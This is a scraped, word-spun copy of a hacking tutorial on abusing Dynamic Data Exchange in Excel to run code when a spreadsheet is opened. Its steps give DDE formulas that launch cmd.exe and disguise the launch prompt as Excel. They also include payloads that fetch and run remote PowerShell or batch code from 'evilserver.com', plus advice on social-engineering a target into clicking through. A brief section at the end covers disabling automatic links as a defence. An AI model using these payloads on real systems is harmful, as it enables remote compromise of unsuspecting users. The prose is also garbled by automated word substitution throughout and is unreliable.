2 months ago

How to Exploit DDE in Microsoft Office & Defend Against DDE-Based Attacks « Null Byte :: WonderHowTo

In our previous article, we learned how to take advantage of a feature, Dynamic Data Exchange (DDE), to run malicious code when an MS Word document can be opened. Because Microsoft built DDE into all of its Office products as a way to transfer data one time or continuously between applications, we can do the same thing in Excel to create a spreadsheet that will runs malicious code when opened. The best part can be, the item will do so without requiring macros to be enabled.

Necurs Botnet Employs DDE Attack to Spread Ransomware

inside time since its discovery as an attack vector, many black hats have been successful in utilizing DDE. For example, the hackers behind the Necurs Botnet, one of the largest at 6 million, have been attempting to distribute Locky ransomware. They first use the botnet to send a surprisingly simple email.

Image by Brad Duncan/SANS ISC InfoSec Forums

This particular email contains an attached Word document which uses DDE to open PowerShell along with execute their code. The method can be illustrated below.

Image by Brad Duncan/SANS ISC InfoSec Forums

Hancitor Malware Uses a DDE Attack, Too

Hancitor malspam, which can be also referred to as Chanitor or Tordal, can be of particular note as the item can be an example of malware that will changed tactics. the item used to rely on macros, however since Oct. 16, 2017, the item has begun to use DDE.

Don’t Miss: Execute Code in a Microsoft Word Document Without Security Warnings

Below, we can see one of the best examples of social engineering that will I’ve seen, which the item uses to spread.

Image by Brad Duncan/SANS ISC InfoSec Forums

The likely reason for the change coming from macros to DDE can be that will the user will no longer get any explicit security warnings. that will being said, you do still get prompts when using DDE, such as the one below.

Image by Brad Duncan/SANS ISC InfoSec Forums

Well, okay. I might not click through that will. With the amount of work that will was put into social engineering the item the Word document, the item’s interesting that will the hackers behind Hancitor didn’t make any attempts to modify the prompt to be less conspicuous. Many people, such as Ryan Hanson on Twitter have shown how This particular can be done.

Image by ryHanson/Twitter

Many hackers have been focused on using DDE in Word. inside last article, we looked at using DDE inside fields of a Word document ourselves. However, DDE can be also used in Excel, Quattro Pro, along with Visual Basic. the item’s surprisingly easy to employ in Excel, so let’s take a quick look at how the item can be done.

Don’t Miss: Create & Obfuscate a Virus Inside of a Microsoft Word Document

Step 1: Open Excel

Start by opening Excel, nothing fancy. at This particular point we could leave the item at that will with This particular step, however for any practical real-world use, we need to spice the item up with some social engineering. In order with This particular to work, we have two requirements. The target will need to click “Update” on the first popup along with click “Yes” on the next.

This particular social-engineering attack takes advantage of the fact that will the user can see the document when the popup appears. This particular lets us put something at the top of the document to make the document appear more legitimate to the user. We just reviewed two examples above that will you can use for inspiration.

Step 2: Add a Formula

DDE allows us to perform command execution through Excel formulas. Excel uses the item as an interprocess communication, which can be used to be call applications coming from within formulas along with even process web requests to return live data to the workbook.

In simple terms, that will lets us write a short formula to start a command prompt. Just add the item to the formula field for any cell.


Let’s look at what we just typed. The cmd can be without an extension, however the item tells Excel to open cmd.exe all the same. If you are interested, Microsoft has more DDE commands. The second part in single quotes can be the arguments we are passing the item.

Here I used /k for a persistent shell, however, you could also use /c for a one-off command. Unfortunately, the argument can be limited to 1,024 bytes, the maximum cmd length for the CreateProcess() function.

Let’s take a quick look at the item in action using calc.exe in place of whatever dubious code we may want to run.

=cmd|’/c calc.exe’!A1

After you enter the item into a cell, save along with close Excel spreadsheet, then reopen the document. You’ll be greeted with the first of two prompts. “Update” needs to be clicked for our code to run.

Then we get the second one. Notice how the item says “Start application ‘CMD.EXE’?” that will should be a red flag for anyone inside know, along with will likely prevent them coming from clicking “Yes.” I’ll show you how we can change that will inside next step.

Once “Yes” can be clicked, we get magic code execution.

Step 3: Add Code

at This particular point that will we understand the basics, we can play around with the item a bit. Remember how I said we can edit the “Start application” popup? the item’s actually quite easy to do, as the item’s just showing the first application we are attempting to run.

This particular allows us to obfuscate the item by hiding cmd.exe behind another less conspicuous application, like Excel itself, however the item will chew through some of our 1,024-byte limit. Try This particular in a cell formula:

=MSEXCEL|’……WindowsSystem32cmd.exe /c calc.exe’!”

Once you press enter, you should see the brand new popup. Notice how the item says “Start application ‘MSEXCEL.EXE’?” the item might be very easy to work that will into any social engineering you do inside document.

After you click “Yes,” you’ll see that will the item executes the code just as before.

at This particular point, what if we wanted to run something more powerful than a calculator? Sensepost has been kind enough to provide an example of how to use the item to open PowerShell along with remotely load a script to execute. To do so, you might type the following formula.

=cmd|’/c powershell.exe -w hidden $e=(brand new-Object System.Net.WebClient).DownloadString(“http://evilserver.com/sp.base64”);powershell -e $e’!A1

— saif/SensePost

however, in reality, that will’s more complicated than we need. the item’s easier to just point cmd /c directly at a .bat script hosted in a WebDAV directory. We’ll do that will instead below.

=cmd|’/c \evilserver.comsp.bat;IEX $e’!A1

— Etienne

You likely notice that will SensePost used =cmd, which we just learned how to obfuscate, so let’s combine the two to fix that will real quick.

=MSEXCEL|’……WindowsSystem32cmd.exe /c \evilserver.comsp.bat;IEX $e’!”

at This particular point we have an Excel formula that will hides what application the item can be actually running, along with then downloads along with executes a .bat file coming from our remote server. the item doesn’t take much imagination to see the mayhem we could cause with This particular.

Don’t Miss: Getting started off with Post-Exploitation of Windows Hosts

Step 4: Save & Send

The last thing to do can be save the document along with send the item off to the target. inside video below, you can see what This particular might look like on the receiving end if you were to download such a document using our obfuscation technique.

Step 5: Update Your Defense

Today. we’ve looked at a quick along with simple way to execute code when an Excel document can be opened. While This particular isn’t unique, what can be special about This particular attack can be that will the word “security” can be never mentioned, allowing a much greater chance for a social-engineering attack to succeed.

If you’re a Microsoft Office user, you should be careful of these along with various other warnings that will may indicate another program can be attempting to execute, or that will a file can be either requesting outside resources or needs unusual permissions to run. In all of these instances, your default reaction to a window like This particular popping up should be to deny permission.

You can take This particular a step further. If you don’t trust yourself to remember to say no to these popups, or just never want to see them, you can get rid of them by disabling automatic links. These settings don’t change across all Office programs, so you will need to open each along with update the settings manually, however the process can be the same for them all. Here’s how to do the item in Word.

Open a Word or any various other Office app you use along with click on “File” inside top left. Then, when a blue bar appears along the left of the screen, click “Options,” which will be at the very bottom. The Word Options box will appear. Click on the “Advanced” tab, then scroll almost all the way down until you see General along with uncheck “Update automatic links at open.”

Once that will can be done, click “OK” to save the modifications. This particular update to the settings will prevent DDE attacks coming from working, without impacting your everyday use of Word.

If you have multiple machines under management control, you can disable DDE execution via registry keys.

DDE Based Attacks inside Future

Clearly, there has been a spike in DDE use inside past few weeks. In spite of This particular, researchers like Brad Duncan don’t think the item will continue like This particular for long.

I think attackers are using DDE because the item’s different. We’ve been seeing the same macro-based attacks for years at This particular point, so perhaps criminals are trying something different just to see if the item works any better. In my opinion, DDE can be probably a little less effective than using macros. […] We might see more DDE-based attacks inside coming weeks, however I predict that will will taper off inside next few months.

— Brad Duncan via Threatpost

that will being said, brand new DDE attack vectors are still being discovered every day. For example, Kevin Beaumont discovered the item could be used in Outlook.

Image by GossiTheDog/Twitter

Then r0lan discovered not even your Microsoft contacts are safe coming from DDE.

Image by yeyint_mth/Twitter

There’s no telling what the next DDE attack vector will be, however you can be sure that will I’ll write a how-to for the item.

Thanks for reading! If you have any questions, you can ask here or on Twitter @The_Hoid.

Cover image via Sense Post/YouTube; Screenshots by Hoid/Null Byte (unless otherwise noted)

Leave a Comment

Your email address will not be published. Required fields are marked *

fifteen − ten =